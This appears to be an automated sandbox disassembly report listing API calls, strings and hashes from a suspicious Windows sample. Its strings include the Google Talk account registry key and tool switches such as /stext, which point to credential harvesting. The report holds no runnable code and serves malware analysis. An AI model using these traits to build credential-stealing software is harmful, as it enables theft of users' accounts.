                                                                                                              • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                              • Instruction ID: 5df47aada64e755ddaac71019e2cddcac14d14db73bdb0f929895f2225ac57a9
                                                                                                              • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                              • Instruction Fuzzy Hash: DB012D01545A4179FF21AAB50C02ABB5F8CDA23364B145B4BF750CB293DB5CC90693FE

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                                • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                                                                                                                • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                                                                                                                • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                                                                                                                • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                                                                                                                • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                                                • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                                                • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                                                • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                                                • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                                                                                                                • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                                                                                                                • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                                                                              • memset.MSVCRT ref: 00408620
                                                                                                                • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                              • memset.MSVCRT ref: 00408671
                                                                                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 004086AF
                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 004086D6
                                                                                                              Strings
                                                                                                              • Software\Google\Google Talk\Accounts, xrefs: 004085F1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                               • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                               • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUser
                                                                                                              • String ID: Software\Google\Google Talk\Accounts
                                                                                                              • API String ID: 1366857005-1079885057
                                                                                                              • Opcode ID: 714fcd6f1c4457602f236ccea557fa2655140a2be8e65fd4c30709a0660f34b2
                                                                                                              • Instruction ID: c9a55fd20ea1a9e1148d2ba128c2c272dfe10edd9ec9a97c612e1cc238572be2
                                                                                                              • Opcode Fuzzy Hash: 714fcd6f1c4457602f236ccea557fa2655140a2be8e65fd4c30709a0660f34b2
                                                                                                              • Instruction Fuzzy Hash: 6E2181B140830AAEE610EF51DD42EAFB7DCEF94344F00083EB984D1192E675D95D9BAB

                                                                                                               Control-flow Graph (legend: Executed / Not Executed)
                                                                                                               control_flow_graph 432 40ba28-40ba3a 433 40ba87-40ba9b call 406c62 432->433 434 40ba3c-40ba52 call 407e20 _mbsicmp 432->434 456 40ba9d call 4107f1 433->456 457 40ba9d call 404734 433->457 458 40ba9d call 404785 433->458 459 40ba9d call 403c16 433->459 460 40ba9d call 410a9c 433->460 439 40ba54-40ba6d call 407e20 434->439 440 40ba7b-40ba85 434->440 445 40ba74 439->445 446 40ba6f-40ba72 439->446 440->433 440->434 441 40baa0-40bab3 call 407e30 449 40bab5-40bac1 441->449 450 40bafa-40bb09 SetCursor 441->450 448 40ba75-40ba76 call 40b5e5 445->448 446->448 448->440 452 40bac3-40bace 449->452 453 40bad8-40baf7 qsort 449->453 452->453 453->450 456->441 457->441 458->441 459->441 460->441
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                               • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                               • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Cursor_mbsicmpqsort
                                                                                                              • String ID: /nosort$/sort
                                                                                                              • API String ID: 882979914-1578091866
                                                                                                              • Opcode ID: c670c5a1dac652336fc4502d32cc243de18414890d70e9aadfbf467d7e8899fc
                                                                                                              • Instruction ID: 8a1fc52e493d51bfa0df36ad286e8752cb28bf69c391dd95ac0f49afa8242728
                                                                                                              • Opcode Fuzzy Hash: c670c5a1dac652336fc4502d32cc243de18414890d70e9aadfbf467d7e8899fc
                                                                                                              • Instruction Fuzzy Hash: 2D2192B1704601EFD719AF75C880A69B7A9FF48318B10027EF419A7291CB39BC12CBD9
                                                                                                              APIs
                                                                                                              • GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
                                                                                                                • Part of subcall function 0044B40E: GetModuleHandleA.KERNEL32(0044B405), ref: 0044B40E
                                                                                                                • Part of subcall function 0044B40E: GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
                                                                                                                • Part of subcall function 0044B40E: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                                                                                • Part of subcall function 0044B40E: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                               • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                               • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 2099061454-0
                                                                                                              • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                              • Instruction ID: 9d5022db8ba3b04779ac2e9664088e7462d9cf1087a2f4409b49694314ac1291
                                                                                                              • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                              • Instruction Fuzzy Hash: FB21F7114496816FFB218BB84C017B67BD8DB13364F19469BE184CB243D76CD85693FA
                                                                                                              APIs
                                                                                                              • GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
                                                                                                              • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                                                                              • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                                                                              • GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                               • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                               • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressProcProtectVirtual$HandleModule
                                                                                                              • String ID:
                                                                                                              • API String ID: 2152742572-0
                                                                                                              • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                              • Instruction ID: 565c9894d902a96607ae12053a83652f4dbbb150929c791eaa1536a67b179355
                                                                                                              • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                              • Instruction Fuzzy Hash: 83F0C201589A407DFE2155B50C42ABB5B8CCA27320B244B07F654CB383D79DC91A93FA
                                                                                                              APIs
                                                                                                                • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll,0040CF6F,771B0A60,?,00000000), ref: 00410D1C
                                                                                                                • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                                                                                              • memset.MSVCRT ref: 00410E10
                                                                                                              • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                                                                              • _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                                                                • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                                                              Strings
                                                                                                              • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                               • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                               • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressCloseLibraryLoadProcVersion_mbscpymemset
                                                                                                              • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                              • API String ID: 889583718-2036018995
                                                                                                              • Opcode ID: 20c56a313fda590c221b6e52e0c08165982b45312d52e9976c101796b2ccff0c
                                                                                                              • Instruction ID: 345612a4203e2947e26158410096d7c3d27216bde768142914c78e2e12d87323
                                                                                                              • Opcode Fuzzy Hash: 20c56a313fda590c221b6e52e0c08165982b45312d52e9976c101796b2ccff0c
                                                                                                              • Instruction Fuzzy Hash: 89110D71C40318EBEB20B6D59C86EEF77ACDB14304F1404A7F555A2112E7BC9ED8C69A
                                                                                                              APIs
                                                                                                              • FindResourceA.KERNEL32(?,?,?), ref: 00410C75
                                                                                                              • SizeofResource.KERNEL32(?,00000000), ref: 00410C86
                                                                                                              • LoadResource.KERNEL32(?,00000000), ref: 00410C96
                                                                                                              • LockResource.KERNEL32(00000000), ref: 00410CA1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                               • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                               • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Resource$FindLoadLockSizeof
                                                                                                              • String ID:
                                                                                                              • API String ID: 3473537107-0
                                                                                                              • Opcode ID: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                                                                                              • Instruction ID: 06b8370cebe37c7de172ca18b7cbf64f7437cd91f528590ddf6fb1777473d23a
                                                                                                              • Opcode Fuzzy Hash: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                                                                                              • Instruction Fuzzy Hash: 090196367012166F8B185F69DD9489F7EAEFB853913084136FC05C6361EB71C9818ED8
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 004109F7
                                                                                                                • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                                                                                                                • Part of subcall function 004075CD: memcpy.MSVCRT(?,00000000,00000003,00000000,%2.2X ,?), ref: 00407618
                                                                                                              • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                                                                                                              • memset.MSVCRT ref: 00410A32
                                                                                                              • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                               • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                               • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                                                                              • String ID:
                                                                                                              • API String ID: 3143880245-0
                                                                                                              • Opcode ID: 886dc5ecc355c3466c5937889f3c24e8c73449ac36ec953dbb08d3698ea6811a
                                                                                                              • Instruction ID: 950c872411b2f2d44c5e3370b52dcf3132a88c3cdc41bb294f16927293e6b240
                                                                                                              • Opcode Fuzzy Hash: 886dc5ecc355c3466c5937889f3c24e8c73449ac36ec953dbb08d3698ea6811a
                                                                                                              • Instruction Fuzzy Hash: A401A172804319BBEF119F50DC86EDB7B7CEF05344F0000A6F604A2052E635AA64CBA9
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ??3@
                                                                                                              • String ID:
                                                                                                              • API String ID: 613200358-0
                                                                                                              • Opcode ID: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                                                                              • Instruction ID: 5841ab7dcc50b440abd9236b7832042a9d7d1d7b8957bb774bcacf87f05c1f29
                                                                                                              • Opcode Fuzzy Hash: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                                                                              • Instruction Fuzzy Hash: AAE046A134974456BA10AF7BAC52F13239CEA803523168C6FB800F36D2EF2CE890846C
                                                                                                              APIs
                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,771B0A60), ref: 00408D5C
                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,771B0A60), ref: 00408D7A
                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,771B0A60), ref: 00408D98
                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,771B0A60), ref: 00408DA8
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ??2@
                                                                                                              • String ID:
                                                                                                              • API String ID: 1033339047-0
                                                                                                              • Opcode ID: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                                                                                              • Instruction ID: b7305a6f8e60e4354fc193aeb8e5872e67636dbc7b7f4d43fc505f02bd19535d
                                                                                                              • Opcode Fuzzy Hash: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                                                                                              • Instruction Fuzzy Hash: EEF031F05433615EEB559F34ED0672536A4E784302F024B3EE2059A2E6EB78D4908B09
                                                                                                              APIs
                                                                                                              • malloc.MSVCRT ref: 00406F4C
                                                                                                              • memcpy.MSVCRT(00000000,00000000,00000000,00000000,771B0A60,00407A43,00000001,?,00000000,771B0A60,00407DBD,00000000,?,?), ref: 00406F64
                                                                                                              • free.MSVCRT ref: 00406F6D
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: freemallocmemcpy
                                                                                                              • String ID:
                                                                                                              • API String ID: 3056473165-0
                                                                                                              • Opcode ID: f6360f64df0fef16feaa284e534344f6101794aca07d62af19e0e66fd0e0db42
                                                                                                              • Instruction ID: 20c18abb4fba39fec419649699297209b7413d51c31022bf8d4f5bc21a778af6
                                                                                                              • Opcode Fuzzy Hash: f6360f64df0fef16feaa284e534344f6101794aca07d62af19e0e66fd0e0db42
                                                                                                              • Instruction Fuzzy Hash: 39F0E9726092235FD7089E7AB881D0BB3ADEF94324711482FF445E7281D738EC60C6A8
                                                                                                              APIs
                                                                                                                • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                                                                                • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,0040709F,Arial,0000000E,00000000), ref: 00407011
                                                                                                              • CreateFontIndirectA.GDI32(?), ref: 004070A6
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateFontIndirect_mbscpymemset
                                                                                                              • String ID: Arial
                                                                                                              • API String ID: 3853255127-493054409
                                                                                                              • Opcode ID: e1a7fbc8e0c3f992e8010e024108b0d146431013d356363f6a3ac0433cd380c2
                                                                                                              • Instruction ID: 3e85f73e1de40fb669f60d67ce34a2ecc2b5129f84855d11383e820b071861b9
                                                                                                              • Opcode Fuzzy Hash: e1a7fbc8e0c3f992e8010e024108b0d146431013d356363f6a3ac0433cd380c2
                                                                                                              • Instruction Fuzzy Hash: FDD0C9A0E4020D67D710F7A0FD47F49776C5B00604F510831B905F10E1EAA4A1184A99
                                                                                                              APIs
                                                                                                                • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                                                                                                                • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                                                                                                                • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                                                                                                                • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                                                                                                                • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                                                                                                              • _strcmpi.MSVCRT ref: 0040CEC3
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: strlen$_strcmpimemset
                                                                                                              • String ID: /stext
                                                                                                              • API String ID: 520177685-3817206916
                                                                                                              • Opcode ID: 04fdc3cc00142dadabd4a88d380940465e4f92171bf306a3922122064ace388a
                                                                                                              • Instruction ID: 693fdb5656bfadad22d3d4febeb48e05c11e25f360cf1d4a61822c7fe8fbaaaa
                                                                                                              • Opcode Fuzzy Hash: 04fdc3cc00142dadabd4a88d380940465e4f92171bf306a3922122064ace388a
                                                                                                              • Instruction Fuzzy Hash: 5B210C71614112DFC3589B39C8C1966B3A9BF45314B15427FA91AAB392C738EC119BC9
                                                                                                              APIs
                                                                                                                • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?), ref: 0040479A
                                                                                                              • LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Library$AddressFreeLoadProc
                                                                                                              • String ID:
                                                                                                              • API String ID: 145871493-0
                                                                                                              • Opcode ID: 368c38512e7cad3fe60d4057cd97a9280d54471de6c65fc2eb8301d482549758
                                                                                                              • Instruction ID: d196b3276b1a656cda378f5c53e28a4a33de773bbf59b12af1a3f4d2ec041ade
                                                                                                              • Opcode Fuzzy Hash: 368c38512e7cad3fe60d4057cd97a9280d54471de6c65fc2eb8301d482549758
                                                                                                              • Instruction Fuzzy Hash: 35F065F8500B039BD7606F34D84879BB3E9AF86310F00453EF961A3281EB38E541CB58
                                                                                                              APIs
                                                                                                              • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                                                                                                                • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                                                                                                                • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                                                                                                                • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: PrivateProfile$StringWrite_itoamemset
                                                                                                              • String ID:
                                                                                                              • API String ID: 4165544737-0
                                                                                                              • Opcode ID: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                                              • Instruction ID: e4187046b5889157fb54d5f6e3f9ccfafaefd38d22cef98a7399574687248963
                                                                                                              • Opcode Fuzzy Hash: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                                              • Instruction Fuzzy Hash: 3DE0B63204020DBFDF125F90EC01AA97B66FF14355F14845AF95804131D37295B0AF94
                                                                                                              APIs
                                                                                                              • FreeLibrary.KERNELBASE(?,?), ref: 0040479A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FreeLibrary
                                                                                                              • String ID:
                                                                                                              • API String ID: 3664257935-0
                                                                                                              • Opcode ID: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                                              • Instruction ID: 8a1fb59f4aee03ee333bbcbb21747f572c22b5e480e1b07aa067c0b07a2bbf9c
                                                                                                              • Opcode Fuzzy Hash: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                                              • Instruction Fuzzy Hash: D2D012750013118FD7605F14FC4CBA173E8AF41312F1504B8E990A7196C3389540CA58
                                                                                                              APIs
                                                                                                              • CreateFileA.KERNELBASE(?,40000000,00000001,00000000,00000002,00000000,00000000,0040B01C,00000000,00000000,00000000,0044C52F,0044C52F,?,0040CF35,0044C52F), ref: 00406D2C
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateFile
                                                                                                              • String ID:
                                                                                                              • API String ID: 823142352-0
                                                                                                              • Opcode ID: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                                              • Instruction ID: b62e2d47ef034db7175ca84798afaf0fa2498f7b6fd9cc80310e9c1c0838826b
                                                                                                              • Opcode Fuzzy Hash: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                                              • Instruction Fuzzy Hash: 59C012F02503007EFF204F10AC4BF37355DE780700F204420BE00E40E2C2A14C008928
                                                                                                              APIs
                                                                                                              • FreeLibrary.KERNELBASE(?,00410825,?,?,?,?,?,?,004041C4), ref: 004107FD
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FreeLibrary
                                                                                                              • String ID:
                                                                                                              • API String ID: 3664257935-0
                                                                                                              • Opcode ID: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                                              • Instruction ID: 34cea44665fc180de0fd44d6926484b1362fa2b4776eba2aa4e53c033fc5eded
                                                                                                              • Opcode Fuzzy Hash: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                                              • Instruction Fuzzy Hash: 8CC04C355107018BE7219B12C949763B7E4BB00316F54C81894A695454D77CE494CE18
                                                                                                              APIs
                                                                                                              • EnumResourceNamesA.KERNEL32(?,?,00410C68,00000000), ref: 00410D02
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
